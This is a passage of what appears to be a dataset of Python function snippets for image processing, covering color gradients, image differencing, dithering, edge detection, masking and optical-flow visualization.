/ 41))\n\n img_false[:, :, 0] = img_red\n img_false[:, :, 1] = img_green\n img_false[:, :, 2] = img_blue\n\n return img_false", "def remove_colors(images):\n images = images[:, :, :, :, 0]\n return images", "def create_color_gradient():\n colors = []\n step = 10\n for red, green in zip(range(255,-step, -step), range(0, 255, step)):\n colors.append({'red': red, 'green': green, 'blue': 0})\n for green, blue in zip(range(255,-step, -step), range(0, 255, step)):\n colors.append({'red': 0, 'green': green, 'blue': blue})\n for blue, red in zip(range(255,-step, -step), range(0, 255, step)):\n colors.append({'red': red, 'green': 0, 'blue': blue})\n return colors", "def diff_image(images):\n prev_image = cv2.absdiff(images[0], images[1])\n cur_image = cv2.absdiff(images[1], images[2])\n return cv2.bitwise_and(prev_image, cur_image)", "def testImageProcessing():\n Im_pix = getRGB( 'in.png' ) # read in the in.png image\n print \"The first two pixels of the first row are\",\n print Im_pix[0][0:2]\n # remember that Im_pix is a list (the image)\n # of lists (each row) of lists (each pixel is [R,G,B])\n New_pix = [ [ [255 - num for num in p] for p in row ] for row in Im_pix ]\n # now, save to the file 'out.png'\n saveRGB( New_pix, 'out.png' )", "def negative(img): \n for pixel in img:\n x, y, col = pixel \n r, g, b = col\n \n new_color = create_color(255 - r, 255 - g, 255 - b)\n set_color(img, x, y, new_color)", "def groupByColor_unlifted(pixmap):\n # Count the number of colors\n nb_colors = int(pixmap.max()) + 1\n # Create a pixmap for each color\n splited = [(pixmap == i) * i for i in range(1, nb_colors)]\n # Filter out empty images\n return [x for x in splited if np.any(x)]", "def diff(self,images):\n diffArray = [0,1,2,3]\n\n # compute the difference bewteen two adjacent images in the same ovtave\n for i in range(1,5):\n diffArray[i-1] = images[i]-images[i-1]\n\n return numpy.array(diffArray)", "def one_color(image,color=[0,0,255]):\r\n output = image.copy()\r\n for line in range(len(image)):\r\n for column in range(len(image[0])):\r\n distance = calc_distance(color,image[line][column])\r\n if distance <=150:\r\n output[line][column]=[255,255,255]\r\n else:\r\n output[line][column]=[0,0,0]\r\n return output", "def diff_image_color(image_path0, image_path1):\n image0 = Image.open(image_path0)\n #color_image0 = get_histogram(image0)\n color_image0 = image0.histogram()\n cut_color_image0 = cut_histogram_min(color_image0)\n image1 = Image.open(image_path1)\n color_image1 = image1.histogram()\n #color_image1 = get_histogram(image1)\n cut_color_image1 = cut_histogram_min(color_image1)\n color_difference = bhattacharyya(color_image0, color_image1)\n return color_difference", "def find_image(grouped):\n for _i in grouped:\n _i[0] = _i[0] * 10 #increases value of red components\n if _i[0] > 225:\n _i[0] = 225\n _i[1] = _i[0] #sets green components equal to red\n _i[2] = _i[0] #sets blue components equal to red\n return grouped", "def _dilate(mat, structure):\n offset_w = int(structure.shape[0]/2)\n offset_h = int(structure.shape[1]/2)\n\n dilated = np.zeros_like(mat)\n for i in range(offset_w, mat.shape[0]-offset_w-1):\n for j in range(offset_h, mat.shape[1]-offset_h-1):\n if mat[i,j] == 255:\n dilated[i-offset_w:i+offset_w+1,j-offset_h:j+offset_h+1] = np.maximum(\n mat[i-offset_w:i+offset_w+1,j-offset_h:j+offset_h+1],\n structure\n )\n return dilated", "def edges(self, step: Vector = 1) -> np.ndarray:\n if isinstance(step, (int, float)):\n step = (step, step)\n nu = self.imgsz[0] / step[0] + 1\n nv = self.imgsz[1] / step[1] + 1\n u = np.linspace(0, self.imgsz[0], int(nu))\n v = np.linspace(0, self.imgsz[1], int(nv))\n return np.vstack(\n (\n np.column_stack((u, np.repeat(0, len(u)))),\n np.column_stack((np.repeat(u[-1], len(v) - 2), v[1:-1])),\n np.column_stack((u[::-1], np.repeat(v[-1], len(u)))),\n np.column_stack((np.repeat(0, len(v) - 2), v[::-1][1:-1])),\n )\n )", "def red_filter(img):\r\n #with Image.open(filename) as img:\r\n w = img.width\r\n h = img.height\r\n\r\n newimg = Image.new('RGB', (w,h))\r\n for y in range(h):\r\n for x in range(w):\r\n r, g, b = img.getpixel((x,y))\r\n \r\n newimg.putpixel((x, y), (r, 0, 0))\r\n \r\n return newimg", "def tile_image(im):\n r1 = np.concatenate((im[::-1,::-1], im[::-1], im[::-1, ::-1]), 1)\n r2 = np.concatenate((im[:,::-1], im, im[:, ::-1]), 1)\n r3 = np.concatenate((im[::-1,::-1], im[::-1], im[::-1, ::-1]), 1)\n return(np.concatenate((r1, r2,r3), 0))", "def _generate_images(self, trace):\n images = []\n colors = []\n colors_by_shape = {}\n for board in trace:\n width = int(round((float(board.shape[1]) / board.shape[0]) * self._height))\n cellsize = width / board.shape[1] # cell size\n img = np.zeros((self._height, width, 3), dtype=np.uint8)\n\n tiles = {} # map from integer rep. of the tile to a shape\n for y in range(board.shape[0]):\n for x in range(board.shape[1]):\n cell = board[y,x]\n if cell not in tiles:\n tiles[cell] = (x, y, 1, 1) # x, y, w, h\n else:\n cur_x, cur_y, cur_w, cur_h = tiles[cell]\n if x >= cur_x + cur_w:\n cur_w = (x-cur_x) + 1\n if y >= cur_y + cur_h:\n cur_h = (y-cur_y) + 1\n tiles[cell] = (cur_x, cur_y, cur_w, cur_h)\n\n # Colors\n if len(colors_by_shape) == 0:\n for tid in tiles:\n shape = (tiles[tid][2], tiles[tid][3])\n if shape not in colors_by_shape:\n colors_by_shape[shape] = hex_to_rgb(random_unique_color(colors))\n colors.append(colors_by_shape[shape])\n\n for tid in tiles:\n x, y, w, h = tiles[tid]\n shape = (w,h)\n empty = board[y,x] == 0\n x, y, w, h = x*cellsize, y*cellsize, w*cellsize, h*cellsize\n # Draw a filled rectangle without color\n if not empty:\n cv2.rectangle(img, (x, y), (x+w, y+h), colors_by_shape[shape],-1)\n else:\n cv2.rectangle(img, (x, y), (x+w, y+h), [0,0,0], -1) #, 8)-\n # Draw a boundary\n cv2.rectangle(img, (x, y), (x+w, y+h), (0, 0, 0), 2, 8)\n \n images.append(img)\n return images", "def fold_diag(pixels):\n copy = blank_image(len(pixels), len(pixels[0])) \n for r in range(len(pixels)):\n for c in range(len(pixels[0])):\n copy[r][c] = pixels[r][c]\n for r in range(len(pixels)):\n for c in range(r):\n copy[r][c] = [255, 255, 255]\n return copy", "def split_image(img):\n xs = [] # positions\n ys = [] # colors\n for row_i in range(img.shape[0]):\n for col_i in range(img.shape[1]):\n xs.append([row_i, col_i])\n ys.append(img[row_i, col_i])\n \n xs = np.array(xs)\n ys = np.array(ys)\n return xs, ys", "def split_image(img):\n xs = [] # positions\n ys = [] # colors\n for row_i in range(img.shape[0]):\n for col_i in range(img.shape[1]):\n xs.append([row_i, col_i])\n ys.append(img[row_i, col_i])\n \n xs = np.array(xs)\n ys = np.array(ys)\n return xs, ys", "def component_filter_by_color(components, img):\n new_component = []\n for component in components:\n component_left_neighbor = img[component[0].start:component[0].stop,\n max(component[1].start - 10, 0):component[1].start]\n component_right_neighbor = img[component[0].start:component[0].stop,\n component[1].stop:min(component[1].stop + 10, img.shape[1])]\n component_up_neighbor = img[max(component[0].start - 10, 0):component[0].start,\n component[1].start:component[1].stop]\n component_low_neighbor = img[component[0].stop:min(component[0].stop + 10, img.shape[0]),\n component[1].start:component[1].stop]\n left_white_ratio = np.sum(component_right_neighbor > 240) / (\n component_right_neighbor.shape[0] * component_right_neighbor.shape[1])\n right_white_ratio = np.sum(component_left_neighbor > 240) / (\n component_left_neighbor.shape[0] * component_left_neighbor.shape[1])\n up_white_ratio = np.sum(component_up_neighbor > 240) / (\n component_up_neighbor.shape[0] * component_up_neighbor.shape[1])\n low_white_ratio = np.sum(component_low_neighbor > 240) / (\n component_low_neighbor.shape[0] * component_low_neighbor.shape[1])\n if np.sum([left_white_ratio > 0.9, right_white_ratio > 0.9, up_white_ratio > 0.9, low_white_ratio > 0.9]) > 2:\n new_component.append(component)\n return new_component", "def gd(a, step_size=0.1, steps=42):\n out = []\n ### YOUR CODE HERE\n out.append(np.array([256,1]))\n for i in range(steps):\n point = out[i]\n gradient = np.array([0.5*2*a[i],0.5*2*a[i+1]])\n npoint = point - step_size*gradient\n out.append(npoint)\n ### END CODE\n return out", "def __diff_image(self):\n img = cv2.imread(self.imagefile()).copy()\n Reference.__draw_bugs(img, self.__true_positives, False, 1)\n Reference.__draw_bugs(img, self.__false_negatives, (0, 255, 0))\n Reference.__draw_bugs(img, self.__false_positives, (0, 0, 255))\n return img", "def CleanBadPixels(spectraUp,spectraDown):\n \n Clean_Up= []\n Clean_Do = []\n Clean_Av = []\n eps=25. # this is the minumum background Please check\n NBSPEC=len(spectraUp)\n for index in np.arange(0,NBSPEC):\n s_up=spectraUp[index]\n s_do=spectraDown[index]\n \n index_up=np.where(s_up<eps)\n index_do=np.where(s_do<eps)\n \n s_up[index_up]=s_do[index_up]\n s_do[index_do]=s_up[index_do]\n s_av=(s_up+s_do)/2.\n \n Clean_Up.append(s_up)\n Clean_Do.append(s_do)\n Clean_Av.append(s_av)\n \n return Clean_Up, Clean_Do,Clean_Av", "def montage(images, w_sub, h_sub, step):\n target = Image.new('RGB', (w_sub*step, h_sub*step))\n left = 0\n right = w_sub\n for i in range(len(images)):\n top=(i//step)*h_sub\n target.paste(images[i], (left, top, right, top+h_sub))\n if(i//step < (i+1)//step):#Check if this row is done\n left = 0#Reset the position in a row\n right = w_sub\n else: #Next picture\n left += w_sub\n right += w_sub\n quality_value = 100\n return target", "def visualize_seam_end_on_image(pixels, end_x):\n\n h = len(pixels)\n w = len(pixels[0])\n\n new_pixels = [[p for p in row] for row in pixels]\n\n min_x = max(end_x - 5, 0)\n max_x = min(end_x + 5, w - 1)\n\n min_y = max(h - 11, 0)\n max_y = h - 1\n\n for y in range(min_y, max_y + 1):\n for x in range(min_x, max_x + 1):\n new_pixels[y][x] = Color(255, 0, 0)\n\n return new_pixels", "def getDiffPercent(path, path2 ):\n global ans\n ans = []\n img = Image.open( path ) \n img2 = Image.open( path2 )\n\n width, height = img.size\n width2, height2 = img2.size\n \n diff = 0\n k = 0\n\n for i in range(width): \n for j in range(height):\n rgb = img.load()[i,j]\n rgb2 = img2.load()[i,j]\n \n if( rgb[0] == rgb2[0] and rgb[1] == rgb2[1] and rgb[2] == rgb2[2] and rgb[0] == 0 and rgb[1] == 0 and rgb[2] == 0 ):\n k = k+1\n if( rgb[0] == rgb2[0] and rgb[1] == rgb2[1] and rgb[2] == rgb2[2] and rgb[0] == 255 and rgb[1] == 255 and rgb[2] == 255 ):\n k = k+1 \n \n diff = diff + pixelDiff(rgb, rgb2)\n\n img.close()\n img2.close()\n \n mx = 3 * 255 * ( width * height - k)\n return 100*diff/mx", "def get_dark_images(new_path, dataframe):\n\n image_list = [i for i in dataframe['image']]\n return [1 if np.mean(np.array(Image.open(new_path + image))) == 0 else 0 for image in image_list]", "def create_masks(rows, columns):\n mask_red = numpy.zeros((rows, columns), 'uint8')\n mask_green = numpy.zeros((rows, columns), 'uint8')\n mask_blue = numpy.zeros((rows, columns), 'uint8')\n final_red = numpy.zeros((rows, columns), 'uint8')\n final_green = numpy.zeros((rows, columns), 'uint8')\n final_blue = numpy.zeros((rows, columns), 'uint8')\n green = numpy.array([[0, 1], [1, 0]])\n blue = numpy.array([[0, 0], [0, 1]])\n red = numpy.array([[1, 0], [0, 0]])\n p = 0\n u = 0\n for i in range(0, rows - 1, 2):\n for j in range(0, columns - 1, 2):\n mask_green[i, j + 1] = green[p, u + 1]\n mask_green[i + 1, j] = green[p + 1, u]\n mask_red[i, j] = red[p, u]\n mask_blue[i + 1, j + 1] = blue[p + 1, u + 1]\n return mask_blue, mask_green, mask_red", "def split_colors(self, color_count, color_from, color_to):\n colors = []\n for c in range(3):#RGB\n step = np.abs(color_from[c] - color_to[c])/color_count\n if step:\n if color_from[c]>color_to[c]:\n color = np.arange(color_from[c],color_to[c],-step)\n else:\n color = np.arange(color_from[c],color_to[c],step)\n else:\n color = [color_from[c] for i in np.arange(color_count)]\n\n\n colors.append(color)\n colors = [(a,b,c) for a,b,c in zip(colors[0],colors[1],colors[2])]\n return colors", "def imageprepare():\r\n file_name = 'temp_image.png'\r\n im = Image.open(file_name).convert('L')\r\n im = im.resize((20, 20))\r\n p = Image.new('L', (28,28), (255))\r\n p.paste(im,(4,4,24,24))\r\n p.save(\"last_image.png\")\r\n\r\n tv = list(p.getdata()) # get pixel values\r\n # normalize pixels to 0 and 1. 0 is pure white, 1 is pure black.\r\n tva = [(255 - x) * 1.0 / 255.0 for x in tv]\r\n tva = np.reshape(tva, (28, 28))\r\n\r\n return tva", "def unique_colors(img):\n colors = {i[1] for i in img.getcolors(maxcolors=img.size[0]*img.size[1])}\n return colors", "def image_enhancement(img):\r\n new_img = []\r\n height = len(img)\r\n width = len(img[0])\r\n for j in range(height-1):\r\n new_img += [[]]\r\n for i in range(width-1):\r\n new_img[2*j] += [img[j][i]]\r\n new_img[2*j] += [np.uint8((int(img[j][i]) + int(img[j][i+1])) / 2)]\r\n new_img[2*j] += [img[j][width-1], img[j][width-1]]\r\n\r\n new_img += [[]]\r\n for i in range(width-1):\r\n new_img[2*j+1] += [np.uint8((int(img[j][i]) + int(img[j+1][i])) / 2)]\r\n new_img[2*j+1] += [np.uint8((int(img[j][i]) + int(img[j][i+1]) + int(img[j+1][i]) + int(img[j+1][i+1])) / 4)]\r\n new_img[2*j+1] += [np.uint8((int(img[j][width-1]) + int(img[j+1][width-1])) / 2),\r\n np.uint8((int(img[j][width-1]) + int(img[j+1][width-1])) / 2)]\r\n\r\n return np.array(new_img)", "def ordered_dithering(pixel, size, matrix):\n\tX, Y = size\n\tN = len(matrix)\n\n\tT = [[255 * (matrix[x][y] + 0.01) / N / N for x in xrange(N)] for y in xrange(N)]\n\n\t# print(T)\n\n\tfor y in xrange(0, Y):\n\t\tfor x in xrange(0, X):\n\t\t\tpixel[x, y] = 255 if pixel[x, y] > T[x % N][y % N] else 0", "def add_unique_colors(image, result, colors=None):\n if colors is None:\n colors = np.unique(image)\n\n unique_side = [False for i in range(10)]\n unique_corner = [False for i in range(10)]\n\n half_size = (((image.shape[0] + 1) // 2), ((image.shape[1] + 1) // 2))\n for (image_part, side, unique_list) in [\n (image[: half_size[0]], \"bottom\", unique_side),\n (image[-half_size[0] :], \"top\", unique_side),\n (image[:, : half_size[1]], \"right\", unique_side),\n (image[:, -half_size[1] :], \"left\", unique_side),\n (image[-half_size[0] :, -half_size[1] :], \"tl\", unique_corner),\n (image[-half_size[0] :, : half_size[1]], \"tr\", unique_corner),\n (image[: half_size[0], : half_size[1]], \"br\", unique_corner),\n (image[: half_size[0], -half_size[1] :], \"left\", unique_corner),\n ]:\n unique = np.uint8(np.unique(image_part))\n if len(unique) == len(colors) - 1:\n color = [x for x in colors if x not in unique][0]\n unique_list[color] = True\n result[\"colors\"][color].append({\"type\": \"unique\", \"side\": side})\n\n for i in range(10):\n if unique_corner[i]:\n result[\"colors\"][i].append({\"type\": \"unique\", \"side\": \"corner\"})\n if unique_side[i]:\n result[\"colors\"][i].append({\"type\": \"unique\", \"side\": \"side\"})\n if unique_side[i] or unique_corner[i]:\n result[\"colors\"][i].append({\"type\": \"unique\", \"side\": \"any\"})\n\n return", "def png2chomp( fname ):\n # open PNG with python image library\n im = Image.open( fname )\n arr = numpy.asarray( im )\n # Find where pixels are black. 255 == white. \n w = numpy.where( arr != 255 ) \n del arr\n # filter the rgb format\n w2 = numpy.where( w[2] == 0 )[0]\n newarr = numpy.vstack( ( w[0][w2], w[1][w2] ) ).T\n chfile = fname.strip('png') + 'cub'\n array2chomp( newarr, chfile )", "def flow_to_image(flow):\n out = []\n maxu = -999.\n maxv = -999.\n minu = 999.\n minv = 999.\n maxrad = -1\n for i in range(flow.shape[0]):\n u = flow[i, :, :, 0]\n v = flow[i, :, :, 1]\n idxunknow = (abs(u) > 1e7) | (abs(v) > 1e7)\n u[idxunknow] = 0\n v[idxunknow] = 0\n maxu = max(maxu, np.max(u))\n minu = min(minu, np.min(u))\n maxv = max(maxv, np.max(v))\n minv = min(minv, np.min(v))\n rad = np.sqrt(u ** 2 + v ** 2)\n maxrad = max(maxrad, np.max(rad))\n u = u / (maxrad + np.finfo(float).eps)\n v = v / (maxrad + np.finfo(float).eps)\n img = compute_color(u, v)\n out.append(img)\n return np.float32(np.uint8(out))", "def compare_images(image1, image2, method='diff', *, n_tiles=(8, 8)):\n if image1.shape != image2.shape:\n raise ValueError('Images must have the same shape.')\n\n img1 = img_as_float(image1)\n img2 = img_as_float(image2)\n\n if method == 'diff':\n comparison = np.abs(img2 - img1)\n elif method == 'blend':\n comparison = 0.5 * (img2 + img1)\n elif method == 'checkerboard':\n shapex, shapey = img1.shape\n mask = np.full((shapex, shapey), False)\n stepx = int(shapex / n_tiles[0])\n stepy = int(shapey / n_tiles[1])\n for i, j in product(range(n_tiles[0]), range(n_tiles[1])):\n if (i + j) % 2 == 0:\n mask[i * stepx:(i + 1)*stepx, j * stepy:(j + 1) * stepy] = True\n comparison = np.zeros_like(img1)\n comparison[mask] = img1[mask]\n comparison[~mask] = img2[~mask]\n else:\n raise ValueError('Wrong value for `method`. '\n 'Must be either \"diff\", \"blend\" or \"checkerboard\".')\n return comparison", "def add_color(self, markers):\n self.img[markers == -1] = [255, 255, 255]\n self.img[markers == 1] = [255, 0, 0]\n self.img[markers == 2] = [0, 50, 0]\n self.img[markers == 3] = [0, 0, 255]\n self.img[markers == 4] = [255, 255, 0]\n self.img[markers == 5] = [0, 255, 255]\n self.img[markers == 6] = [255, 0, 255]\n\n self.img[markers == 7] = [125, 0, 0]\n self.img[markers == 8] = [0, 125, 0]\n self.img[markers == 9] = [0, 0, 125]\n self.img[markers == 10] = [125, 125, 0]\n self.img[markers == 11] = [0, 125, 125]\n self.img[markers == 12] = [125, 0, 125]\n\n self.img[markers == 13] = [255, 255, 255]\n self.img[markers == 14] = [255, 0, 0]\n self.img[markers == 15] = [0, 255, 0]\n self.img[markers == 16] = [0, 0, 255]\n self.img[markers == 17] = [255, 255, 0]\n self.img[markers == 18] = [0, 255, 255]\n self.img[markers == 19] = [255, 0, 255]", "def sharp_diff_error(gen_frames, gt_frames):\n shape = tf.shape(gen_frames)\n num_pixels = tf.to_float(shape[1] * shape[2] * shape[3])\n\n # gradient difference\n # create filters [-1, 1] and [[1],[-1]] for diffing to the left and down respectively.\n # TODO: Could this be simplified with one filter [[-1, 2], [0, -1]]?\n pos = tf.constant(np.identity(3), dtype=tf.float32)\n neg = -1 * pos\n filter_x = tf.expand_dims(tf.stack([neg, pos]), 0) # [-1, 1]\n filter_y = tf.stack([tf.expand_dims(pos, 0), tf.expand_dims(neg, 0)]) # [[1],[-1]]\n strides = [1, 1, 1, 1] # stride of (1, 1)\n padding = 'SAME'\n\n gen_dx = tf.abs(tf.nn.conv2d(gen_frames, filter_x, strides, padding=padding))\n gen_dy = tf.abs(tf.nn.conv2d(gen_frames, filter_y, strides, padding=padding))\n gt_dx = tf.abs(tf.nn.conv2d(gt_frames, filter_x, strides, padding=padding))\n gt_dy = tf.abs(tf.nn.conv2d(gt_frames, filter_y, strides, padding=padding))\n\n gen_grad_sum = gen_dx + gen_dy\n gt_grad_sum = gt_dx + gt_dy\n\n grad_diff = tf.abs(gt_grad_sum - gen_grad_sum)\n\n batch_errors = 10 * log10(1 / ((1 / num_pixels) * tf.reduce_sum(grad_diff, [1, 2, 3])))\n return tf.reduce_mean(batch_errors)", "def denoise(grouped, width, height, reach, beta):\n new_pixels = []\n new_pixels = copy.deepcopy(grouped)\n for row in range(height):\n for column in range(width):\n neighbors = locate_neighbors(grouped, row, column, width, height, reach)\n insertion_sort(neighbors)\n med = neighbors[len(neighbors)//2]\n row_num = (row * width) + column\n original = new_pixels[row_num][0]\n if abs(original - med) / (original + 0.1) > beta:\n new_pixels[row_num][0] = int(med)\n new_pixels[row_num][1] = int(med)\n new_pixels[row_num][2] = int (med)\n return new_pixels", "def processframe(pilimage):\n # TODO: Idea on of overfilling\n # [[0,0,0],\n # [1,1,1],\n # [0,0,0]]\n # Keep this as template. aka pattern. use scipy measure and that s pattern to match all connecting\n # this gets all the fills. the rest is thrown into the pile of sets.\n # we assume index 0 as discarded (Can't really do much with black images.)\n numpyarrayfrompil = numpy.array(pilimage)\n # First we pass to regionprops\n props = createfillers(numpyarrayfrompil)\n # pass all the data we need now to the mapprops2color\n # returns a string which can be cerealised.\n return mapprops2color(props, numpyarrayfrompil, pilimage)", "def find_reddest_pixel(img):\n # HINTS/ADVICE-------------\n # Use a nested for loop here.\n #\n # BE CAREFUL DOING ARITHMETIC WITH UNSIGNED INTEGERS: \n # >>> a = np.array([2], dtype='uint8')\n # >>> b = np.array([3], dtype='uint8')\n # >>> a - b\n # array([255], dtype=uint8)\n #\n # Reminder:\n # numpy arrays have a \"shape\" attribute that stores the layout:\n # img.shape[0] - rows\n # img.shape[1] - columns\n # img.shape[2] - color channels\n\n max_redness = 0\n max_x = 0\n max_y = 0\n \n img = np.array(img, dtype = 'int32')\n for r in range(img.shape[0]):\n for c in range(img.shape[1]):\n red = img[r, c, 2]\n green = img[r, c, 1]\n blue = img[r, c, 0] \n redness = (red - green) + (red - blue)\n\n if redness > max_redness:\n max_redness = redness\n max_x = c\n max_y = r\n \n return (max_x, max_y)", "def show_methods_differences(gt_path, img_m1_path, img_m2_path, thr, step, save_folder, methods):\n name = gt_path.split('/')[-1]\n name = name.split('.')[0]\n if not os.path.exists(os.path.join(save_folder, methods)):\n os.makedirs(os.path.join(save_folder, methods))\n\n gt = cv2.imread(gt_path)\n gt = gaussian_filter(gt, sigma=1)\n img_m1 = cv2.imread(img_m1_path)\n img_m1 = gaussian_filter(img_m1, sigma=1)\n img_m2 = cv2.imread(img_m2_path)\n img_m2 = gaussian_filter(img_m2, sigma=1)\n r, c, z = gt.shape\n mask = np.zeros((r, c, 3))\n dif_gt_m1 = np.abs(gt - img_m1)\n cv2.imwrite(os.path.join(save_folder, methods, name + 'gt_m1.png'), dif_gt_m1)\n dif_gt_m2 = np.abs(gt - img_m2)\n cv2.imwrite(os.path.join(save_folder, methods, name + 'gt_m2.png'), dif_gt_m2)\n\n # GREEN WILL BE ASSIGNED TO THOSE PIXELS THAT HAS LOWER DIFF USING FIRST METHOD AND RED TO THE SECOND\n for i in range(step,r-step-1,step):\n for j in range(0,c-1,step):\n print(np.mean(dif_gt_m1[i, j, :]))\n print(np.mean(dif_gt_m2[i, j, :]))\n print('-------------------------')\n if int(np.mean(dif_gt_m1[i, j, :])) > thr and int(np.mean(dif_gt_m2[i, j, :])) > thr:\n if np.mean(dif_gt_m1[i, j, :]) > np.mean(dif_gt_m2[i, j, :]):\n mask[i-step:i+step, j-step:j+step, :] = [0, 0, 1]\n else:\n mask[i-step:i+step, j-step:j+step, :] = [0, 1, 0]\n mask = mask*255\n cv2.imwrite(os.path.join(save_folder, methods, name + '.png'), mask)", "def generate_lut(self):\n r,g,b=(Numeric.zeros(256),Numeric.zeros(256),Numeric.zeros(256))\n for i in Numeric.arange(256):\n r_,g_,b_=self.colfct(i/255.0) # these are from [0,1]\n r[i],g[i],b[i]=int(255*r_),int(255*g_),int(255*b_)\n return r,g,b", "def extract_red(img):\n red_img = np.zeros(img.shape)\n logic = np.zeros((img.shape[0], img.shape[1]))\n np.logical_and(img[:, :, 2] > 50, img[:, :, 1] < 100, logic)\n np.logical_and(img[:, :, 0] < 100, logic, logic)\n\n red_img[logic.astype(bool)] = [0, 0, 255]\n return red_img", "def setColors(self):\n #productive\n profprint()\n self.color= [[0,0,0] for i in range(205)]\n self.color255= self.setColors255()\n for i in range(205):\n for j in range(3):\n self.color[i][j] = self.color255[i][j]/float(255)\n\n return self.color", "def detectEdges(image, amount):\n\n def average(triple):\n (r, g, b) = triple\n return (r + g + b) / 3\n\n blackPixel = (0, 0, 0)\n whitePixel = (255, 255, 255)\n new = image.clone()\n for y in range(image.getHeight() - 1):\n for x in range(1, image.getWidth()):\n oldPixel = image.getPixel(x, y)\n leftPixel = image.getPixel(x - 1, y)\n bottomPixel = image.getPixel(x, y + 1)\n oldLum = average(oldPixel)\n leftLum = average(leftPixel)\n bottomLum = average(bottomPixel)\n if abs(oldLum - leftLum) > amount or \\\n abs(oldLum - bottomLum) > amount:\n new.setPixel(x, y, blackPixel)\n else:\n new.setPixel(x, y, whitePixel)\n return new", "def color(step: int=10) -> Tuple[int, int, int]:\n # Randomly seed the r g b values\n r, g, b = (random_uniform(0, 255), random_uniform(0, 255),\n random_uniform(0, 255))\n\n # Randomly determine if each r g and b value is increasing or not\n r_inc = True\n g_inc = True\n b_inc = True\n r_step = random_uniform(step)\n g_step = random_uniform(step)\n b_step = random_uniform(step)\n\n # Yield the initial r, g, b values\n yield r, g, b\n\n # Loop and yeild forever\n while True:\n # If r is increasing\n if r_inc:\n # Increment r by the step\n r += r_step\n # Ensure that the next step will be within the limits\n # if not then set the flag to decreasing\n r_inc = r < 255 - r_step\n # If r is decreasing\n else:\n # Decrement r by the step\n r -= r_step\n # Ensure that the next step will be within the limits\n # if not then set the flag to increasing\n r_inc = r < r_step\n\n # See above\n if g_inc:\n g += g_step\n g_inc = g < 255 - g_step\n else:\n g -= g_step\n g_inc = g < g_step\n\n # See above\n if b_inc:\n b += b_step\n b_inc = b < 255 - b_step\n else:\n b -= b_step\n b_inc = b < b_step\n\n # Yield the red, green, and blue values\n yield r, g, b", "def detectEdges(image, amount):\n\n def average(triple):\n (r, g, b) = triple\n return (r + g + b) // 3\n\n blackPixel = (0, 0, 0)\n whitePixel = (255, 255, 255)\n new = image.clone()\n y = 0\n for y in range(image.getHeight() - 1):\n for x in range(1, image.getWidth()):\n oldPixel = image.getPixel(x, y)\n leftPixel = image.getPixel(x - 1, y)\n bottomPixel = image.getPixel(x, y + 1)\n oldLum = average(oldPixel)\n leftLum = average(leftPixel)\n bottomLum = average(bottomPixel)\n if abs(oldLum - leftLum) > amount or \\\n abs(oldLum - bottomLum) > amount:\n new.setPixel(x, y, blackPixel)\n else:\n new.setPixel(x, y, whitePixel)\n return new", "def del2(im_input):\n\n # initialize output\n im_lap = np.zeros(im_input.shape)\n\n # process rows first\n D = np.diff(im_input, axis=0)\n S = np.zeros(im_input.shape)\n S[1:-1, :] = (D[1:, :] - D[0:-1, :]) / 2\n if im_input.shape[0] > 3:\n S[0, :] = 2 * S[1, :] - S[2, :]\n S[-1, :] = 2 * S[-2, :] - S[-3, :]\n elif im_input.shape[0] == 3:\n S[0, :] = S[1, :]\n S[-1, :] = S[1, :]\n else:\n S[0, :] = 0\n S[-1, :] = 0\n im_lap += S\n\n # process columns\n D = np.diff(im_input, axis=1)\n S = np.zeros(im_input.shape)\n S[:, 1:-1] = (D[:, 1:] - D[:, 0:-1]) / 2\n if im_input.shape[1] > 3:\n S[:, 0] = 2 * S[:, 1] - S[:, 2]\n S[:, -1] = 2 * S[:, -2] - S[:, -3]\n elif im_input.shape[1] == 3:\n S[0, :] = S[:, 1]\n S[:, -1] = S[:, 1]\n else:\n S[:, 0] = 0\n S[:, -1] = 0\n im_lap += S\n\n return im_lap / 2", "def sane(im,rangeTuple,y,start,end):\r\n #im = Image.open(pageImage)\r\n print(im.n_frames)\r\n lst = []\r\n for pg in range(rangeTuple[0],rangeTuple[1]+1):\r\n acc = True \r\n im.seek(pg)\r\n pix = im.load()\r\n for i in range(start,end):\r\n if(pix[i,y][0]!=0 or pix[i,y][1]!=255):\r\n acc = False \r\n break\r\n if(acc):\r\n lst.append(pg)\r\n return lst", "def extract(self, files):\n for i in range(len(files)):\n print(files[i])\n img = cv2.imread('{}/{}'.format('{}/{}/{}'.format(DIR_2DST_Mask, self.patient, self.plan), files[i]), 0)\n\n \"\"\"\n Find the indices of array elements that are non-zero, i.e,\n find the pixels' positions that represents the respiratory\n functions (pixels in the respiratory function are brighter).\n \"\"\"\n color_pts = np.argwhere(img > 70)\n\n \"\"\"\n Sorts the pixels according to their x coordenate.\n Obs: np.argwhere inverts x and y, it's like (y, x), because of it,\n the parameter of itemgetter is 1 (to get x coordinate)\n \"\"\"\n lcolor_pts = sorted(color_pts.tolist(), key=itemgetter(1))\n\n \"\"\"\n If there is no pixel representing the respiratory function\n (i.e., lighter pixel) it creates an empty image (without any\n respiratory function)\n \"\"\"\n if len(lcolor_pts) == 0:\n diaphragmatic_lvl = np.zeros((256, 50, 3), np.uint8)\n\n cv2.imwrite('{}/{}/{}/{}'.format(\n DIR_2DST_Diaphragm, patient, plan, files[i]), diaphragmatic_lvl)\n\n # file = open(\n # '{}/{}/{}/points.txt'.format(DIR_2DST_Diaphragm, self.patient, self.plan), 'a')\n # file.write(\"{}:{}\\n\".format(files[i], []))\n # file.close()\n\n continue\n\n # Reverse the coordinates and store the result in lordered_pts list\n lordered_pts = []\n for j in range(len(lcolor_pts)):\n lordered_pts.append(lcolor_pts[j][::-1])\n\n \"\"\"\n Convert pixels coordinates into a tuples and check which column\n has pixels that corresponding to diaphragmatic level\n Obs. There are some columns that doesnt have any pixel that\n correpond to diaphragmatic level.\n \"\"\"\n # Columns that have a pixel corresponding diaphragmatic level\n lcolumn_available = []\n for j in range(len(lordered_pts)):\n lordered_pts[j] = tuple(lordered_pts[j])\n lcolumn_available.append(lordered_pts[j][0])\n lcolumn_available = list(set(lcolumn_available))\n # print(\"Ordered points: \", lordered_pts)\n # print(\"Columns available: \", lcolumn_available)\n\n \"\"\"\n If there is not enough columns to build a respiratory pattern,\n create a blank image\n \"\"\"\n if len(lcolumn_available) < 20:\n diaphragmatic_lvl = np.zeros((256, 50, 3), np.uint8)\n cv2.imwrite('{}/{}/{}/{}'.format(\n DIR_2DST_Diaphragm, patient, plan, files[i]), diaphragmatic_lvl)\n continue\n\n \"\"\"\n If there are no pixel that corresponding diaphragmatic level in the\n first column, assign to it the value of the second y coordinate\n \"\"\"\n if lcolumn_available[0] is not 0:\n y = max(\n [x for x in lordered_pts if x[0] == lcolumn_available[0]],\n 